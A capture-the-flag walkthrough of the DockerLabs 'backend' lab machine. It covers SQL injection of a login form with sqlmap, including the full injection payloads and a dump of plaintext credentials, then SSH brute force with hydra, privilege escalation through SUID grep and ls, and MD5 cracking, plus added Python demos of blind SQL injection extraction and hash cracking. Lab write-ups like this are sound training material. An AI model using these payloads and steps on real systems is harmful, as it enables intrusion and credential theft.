Once we have the .zip, we copy it to the environment we will attack the machine from and run the following.
unzip backend.zip
That unpacks it; then we deploy the machine like this.
bash auto_deploy.sh backend.tar
Output:
[DockerLabs ASCII-art banner]
Deploying the vulnerable machine, please wait a moment.
Machine deployed, its IP address is --> 172.17.0.2
Press Ctrl+C when you are done with the machine to remove it
So when we are done with the machine we press Ctrl+C and it is removed, leaving no leftover files behind.
Port scan
(The nmap output is reproduced at the end of this page.)
If we browse to the web server we see a login form, at the following address:
To test it for SQL injection we first capture the login request with Burp Suite: submit any credentials (admin:admin in my case) and press login while Burp is intercepting. The captured request looks like this, and we save it to a file:
request.txt
sqlmap
We pass the saved request to sqlmap and, if the injection works, enumerate the databases to see what is there:
(sqlmap database enumeration output: see the end of this page.)
It did enumerate the databases, and among them one called users stands out, so we list its tables:
(sqlmap table enumeration output: see the end of this page.)
It contains a table called usuarios:
(sqlmap column enumeration output: see the end of this page.)
It has two interesting columns, username and password, so we dump the rows:
(sqlmap table dump: see the end of this page.)
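The following is an added example, not code from the write-up or from the backend machine. It models the login that sqlmap attacked with an in-memory sqlite3 database standing in for the MariaDB backend (the usuarios rows are constructed to mirror the dump above), shows the quote-and-OR bypass against string-concatenated SQL and the same input failing against a parameterised query, and then the boolean-based blind extraction loop that sqlmap automates, recovering pepe's password one character at a time through a true/false oracle. The names Target, oracle and extract are this example's own.

```python
# Added example, not code from the write-up or from the target machine.
# sqlite3 stands in for the MariaDB backend; ROWS is constructed to mirror
# the users.usuarios dump shown on the page.
import sqlite3

ROWS = [(1, "paco", "$paco$123"), (2, "pepe", "P123pepe3456P"), (3, "juan", "jjuuaann123")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE usuarios (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO usuarios VALUES (?, ?, ?)", ROWS)
    return db


class Target:
    """Stand-in for the login endpoint; counts how many queries the attacker sends."""

    def __init__(self):
        self.db = make_db()
        self.queries = 0

    def login_vulnerable(self, username, password):
        """String concatenation: attacker input becomes SQL syntax, not just a value."""
        self.queries += 1
        sql = ("SELECT id, username FROM usuarios "
               f"WHERE username = '{username}' AND password = '{password}'")
        return self.db.execute(sql).fetchone()

    def login_safe(self, username, password):
        """Bound parameters: values travel separately from the SQL, so quotes stay data."""
        sql = "SELECT id, username FROM usuarios WHERE username = ? AND password = ?"
        return self.db.execute(sql, (username, password)).fetchone()


def oracle(target, condition):
    """Boolean-based blind oracle: True if the injected condition logged us in."""
    return target.login_vulnerable(f"x' OR ({condition})-- ", "irrelevant") is not None


def extract(target, column, where, max_len=64):
    """Recover a string one character at a time, binary-searching each code point
    (what sqlmap does behind its 'boolean-based blind' technique)."""
    sub = f"(SELECT {column} FROM usuarios WHERE {where})"
    out = ""
    for i in range(1, max_len + 1):
        if not oracle(target, f"length({sub}) >= {i}"):
            break                       # past the end of the string
        lo, hi = 0, 127                 # ASCII range is enough for these passwords
        while lo < hi:                  # 7 oracle queries per character
            mid = (lo + hi) // 2
            if oracle(target, f"unicode(substr({sub}, {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    target = Target()
    bypass = target.login_vulnerable("admin' OR 1=1-- ", "anything")  # logs in with no valid password
    blocked = target.login_safe("admin' OR 1=1-- ", "anything")       # None: input treated as a literal
    pepe_pw = extract(target, "password", "username = 'pepe'")
    return bypass, blocked, pepe_pw, target.queries


if __name__ == "__main__":
    print(demo())
```

Each recovered character costs one length probe plus seven comparisons, which is why a full dump through a blind technique needs hundreds of requests even on a three-row table; sqlmap prefers the error-based and UNION techniques it also found because they return whole values per request.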
Escalate to user pepe
Hydra
We now have the credentials of 3 users, returned in plaintext because the application stores passwords unhashed. To see which of them also work for SSH we brute force the service, building one wordlist of usernames and one of passwords:
users.txt
pass.txt
And launch hydra (hydra itself warns that -t 64 is too many parallel tasks for SSH; with only nine combinations to try, -t 4 is plenty and avoids tripping sshd's MaxStartups limit):
(hydra output: see the end of this page.)
Hydra finds working credentials for the user pepe, so we connect with them.
SSH
Enter P123pepe3456P as the password and we are in.
Privilege escalation
Listing the binaries with the SUID bit set, two of them stand out: grep and ls. A SUID-root binary runs with root's effective UID, so whatever root can open, they can open: ls lists directories we otherwise cannot enter, and grep prints the contents of files we otherwise cannot read.
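An added example (not from the write-up): a SUID enumerator in Python with the same logic as find / -perm -4000 -type f, run against a constructed temporary directory so it works without root and touches no real system binaries. The ABUSABLE set is a hand-picked subset, assumed here, of tools that hand over root file access when SUID; the sandbox mirrors what the box exposes (SUID grep and ls) plus a normally SUID passwd for contrast.

```python
# Added example, not part of the write-up: a SUID enumerator with the same logic
# as `find / -perm -4000 -type f`, run against a throwaway directory tree so it
# needs no root. ABUSABLE is an assumed, hand-picked subset of tools that give
# root file access when SUID, not a full catalogue.
import os
import shutil
import stat
import tempfile

# When SUID root: ls lists protected directories, grep/cat/... print protected files.
ABUSABLE = {"grep", "ls", "cat", "less", "more", "head", "tail", "find", "vim", "base64"}


def find_suid(root):
    """Regular files under root with S_ISUID set, like find -perm -4000 -type f."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                     # unreadable entry, same as 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def triage(paths):
    """Separate SUID binaries known to read files as root from the rest."""
    interesting = [p for p in paths if os.path.basename(p) in ABUSABLE]
    rest = [p for p in paths if p not in interesting]
    return interesting, rest


def build_sandbox():
    """Constructed layout: SUID grep and ls (as on the box), SUID passwd (normal
    on any Linux), and a cat without the bit."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bin_dir = os.path.join(root, "usr", "bin")
    os.makedirs(bin_dir)
    for name, suid in (("grep", True), ("ls", True), ("passwd", True), ("cat", False)):
        path = os.path.join(bin_dir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, 0o755 | (stat.S_ISUID if suid else 0))
    return root


def demo():
    root = build_sandbox()
    try:
        interesting, rest = triage(find_suid(root))
        return ([os.path.basename(p) for p in interesting],
                [os.path.basename(p) for p in rest])
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())  # (['grep', 'ls'], ['passwd'])
```

The triage step is the part that matters on a real box: most SUID hits (passwd, sudo, mount) are expected, and the review is about the handful that should never carry the bit.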
Using them, we find an interesting file called pass.hash, which we can read the same way:
It contains an MD5 hash. MD5 is a one-way hash, not an encoding, so it cannot be decoded: it is cracked by hashing candidate passwords (from a wordlist or an online lookup table) until one produces the same digest, which here recovers the root password.
So we use it to become root.
Enter spongebob34 as the password and we are root.
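An added example (not from the write-up) of how pass.hash is actually recovered: MD5 is a one-way hash, so it is cracked by hashing guesses and comparing digests, which is what an online lookup or hashcat -m 0 does. The target digest is computed from the known result spongebob34 because the page does not reproduce the real file; the wordlist and the small mutation rule set (capitalise, two-digit suffix) are this example's own and go a little beyond the page by showing the password falling even when only the base word spongebob is in the list.

```python
# Added example, not part of the write-up. MD5 is a one-way hash, so pass.hash is
# cracked, not decoded: hash each candidate and compare digests (what an online
# lookup table or `hashcat -m 0` does). The target digest and the wordlist are
# constructed here; the page does not reproduce the real contents of pass.hash.
import hashlib

# Constructed wordlist: the base word is present, the exact password is not.
WORDLIST = ["password", "123456", "patrick", "spongebob", "squarepants"]
TARGET_HASH = hashlib.md5(b"spongebob34").hexdigest()  # stands in for pass.hash


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def is_md5_hex(value):
    """A raw MD5 digest is exactly 32 hex characters; anything else is another format."""
    v = value.strip().lower()
    return len(v) == 32 and all(c in "0123456789abcdef" for c in v)


def mutations(word):
    """Tiny rule set in the spirit of hashcat rules: as-is, capitalised, two-digit suffix."""
    yield word
    yield word.capitalize()
    for n in range(100):
        yield f"{word}{n:02d}"


def crack_md5(target_hex, candidates):
    """First guess whose MD5 equals target_hex, or None (also None for non-MD5 input)."""
    if not is_md5_hex(target_hex):
        return None
    target = target_hex.strip().lower()
    for word in candidates:
        for guess in mutations(word):
            if md5_hex(guess) == target:
                return guess
    return None


def demo():
    return crack_md5(TARGET_HASH, WORDLIST)


if __name__ == "__main__":
    print(demo())  # spongebob34
```

The format check matters in practice: a salted md5crypt string starts with $1$ and is a different target (hashcat -m 500), and feeding it to a raw-MD5 cracker or lookup site silently yields nothing.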
Port scan output (nmap):
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-10 05:37 EST
Nmap scan report for spainmerides.dl (172.17.0.2)
Host is up (0.000038s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 08:ba:95:95:10:20:1e:54:19:c3:33:a8:75:dd:f8:4d (ECDSA)
|_ 256 1e:22:63:40:c9:b9:c5:6f:c2:09:29:84:6f:e7:0b:76 (ED25519)
80/tcp open http Apache httpd 2.4.61 ((Debian))
|_http-server-header: Apache/2.4.61 (Debian)
|_http-title: test page
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds
sqlmap run 1, enumerating databases (sqlmap 1.8.11#stable, https://sqlmap.org):
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:41:02 /2025-01-10/
[05:41:02] [INFO] parsing HTTP request from 'request.txt'
[05:41:02] [INFO] testing connection to the target URL
got a 302 redirect to 'http://172.17.0.2/logerror.html'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
[05:41:06] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:41:06] [INFO] testing if the target URL content is stable
[05:41:06] [WARNING] POST parameter 'username' does not appear to be dynamic
[05:41:06] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
[05:41:06] [INFO] testing for SQL injection on POST parameter 'username'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[05:41:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:41:08] [WARNING] reflective value(s) found and filtering out
[05:41:08] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:41:08] [INFO] testing 'Generic inline queries'
[05:41:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[05:41:09] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[05:41:09] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[05:41:09] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[05:41:09] [INFO] POST parameter 'username' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[05:41:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[05:41:09] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[05:41:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[05:41:09] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[05:41:09] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[05:41:09] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[05:41:09] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[05:41:09] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[05:41:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[05:41:09] [INFO] POST parameter 'username' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[05:41:09] [INFO] testing 'MySQL inline queries'
[05:41:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[05:41:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[05:41:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[05:41:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[05:41:09] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[05:41:09] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[05:41:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[05:41:19] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[05:41:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[05:41:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[05:41:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[05:41:19] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[05:41:19] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N]
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[05:41:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[05:41:22] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[05:41:24] [INFO] testing 'MySQL UNION query (40) - 21 to 40 columns'
[05:41:24] [INFO] testing 'MySQL UNION query (20) - 41 to 60 columns'
[05:41:24] [INFO] testing 'MySQL UNION query (20) - 61 to 80 columns'
[05:41:24] [INFO] testing 'MySQL UNION query (20) - 81 to 100 columns'
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 318 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=admin' RLIKE (SELECT (CASE WHEN (8933=8933) THEN 0x61646d696e ELSE 0x28 END))-- AJzr&password=admin
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=admin' AND (SELECT 7445 FROM(SELECT COUNT(*),CONCAT(0x717a787a71,(SELECT (ELT(7445=7445,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IIJH&password=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5315 FROM (SELECT(SLEEP(5)))gRbi)-- HTBl&password=admin
---
[05:41:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[05:41:25] [INFO] fetching database names
[05:41:25] [INFO] retrieved: 'information_schema'
[05:41:25] [INFO] retrieved: 'performance_schema'
[05:41:25] [INFO] retrieved: 'sys'
[05:41:25] [INFO] retrieved: 'mysql'
[05:41:25] [INFO] retrieved: 'users'
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users
[05:41:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 05:41:25 /2025-01-10/
sqlmap run 2, listing the tables of the users database:
[*] starting @ 05:44:37 /2025-01-10/
[05:44:37] [INFO] parsing HTTP request from 'request.txt'
[05:44:37] [INFO] resuming back-end DBMS 'mysql'
[05:44:37] [INFO] testing connection to the target URL
got a 302 redirect to 'http://172.17.0.2/logerror.html'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[05:44:37] [INFO] fetching tables for database: 'users'
[05:44:37] [INFO] retrieved: 'usuarios'
Database: users
[1 table]
+----------+
| usuarios |
+----------+
[05:44:37] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 05:44:37 /2025-01-10/
sqlmap run 3, listing the columns of users.usuarios:
[*] starting @ 05:45:42 /2025-01-10/
[05:45:42] [INFO] parsing HTTP request from 'request.txt'
[05:45:42] [INFO] resuming back-end DBMS 'mysql'
[05:45:42] [INFO] testing connection to the target URL
got a 302 redirect to 'http://172.17.0.2/logerror.html'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[05:45:42] [INFO] fetching columns for table 'usuarios' in database 'users'
[05:45:42] [INFO] starting 3 threads
[05:45:42] [INFO] retrieved: 'id'
[05:45:42] [INFO] retrieved: 'password'
[05:45:42] [INFO] retrieved: 'username'
[05:45:42] [INFO] retrieved: 'int(11)'
[05:45:43] [INFO] retrieved: 'varchar(255)'
[05:45:43] [INFO] retrieved: 'varchar(255)'
Database: users
Table: usuarios
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(11) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+
[05:45:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 05:45:43 /2025-01-10/
sqlmap run 4, dumping users.usuarios:
[*] starting @ 05:46:42 /2025-01-10/
[05:46:42] [INFO] parsing HTTP request from 'request.txt'
[05:46:42] [INFO] resuming back-end DBMS 'mysql'
[05:46:42] [INFO] testing connection to the target URL
got a 302 redirect to 'http://172.17.0.2/logerror.html'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[05:46:42] [INFO] fetching columns for table 'usuarios' in database 'users'
[05:46:42] [INFO] starting 3 threads
[05:46:42] [INFO] resumed: 'id'
[05:46:42] [INFO] resumed: 'int(11)'
[05:46:42] [INFO] resumed: 'username'
[05:46:42] [INFO] resumed: 'varchar(255)'
[05:46:42] [INFO] resumed: 'password'
[05:46:42] [INFO] resumed: 'varchar(255)'
[05:46:42] [INFO] fetching entries for table 'usuarios' in database 'users'
[05:46:42] [INFO] starting 3 threads
[05:46:42] [INFO] retrieved: '1'
[05:46:42] [INFO] retrieved: '3'
[05:46:42] [INFO] retrieved: '2'
[05:46:42] [INFO] retrieved: '$paco$123'
[05:46:42] [INFO] retrieved: 'jjuuaann123'
[05:46:42] [INFO] retrieved: 'paco'
[05:46:42] [INFO] retrieved: 'P123pepe3456P'
[05:46:42] [INFO] retrieved: 'juan'
[05:46:42] [INFO] retrieved: 'pepe'
Database: users
Table: usuarios
[3 entries]
+----+---------------+----------+
| id | password | username |
+----+---------------+----------+
| 1 | $paco$123 | paco |
| 2 | P123pepe3456P | pepe |
| 3 | jjuuaann123 | juan |
+----+---------------+----------+
[05:46:42] [INFO] table 'users.usuarios' dumped to CSV file '/root/.local/share/sqlmap/output/172.17.0.2/dump/users/usuarios.csv'
[05:46:42] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 05:46:42 /2025-01-10/
users.txt:
paco
pepe
juan
pass.txt:
$paco$123
P123pepe3456P
jjuuaann123
hydra command and output:
hydra -L users.txt -P pass.txt ssh://<IP> -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-10 05:47:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: pepe password: P123pepe3456P
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-10 05:48:02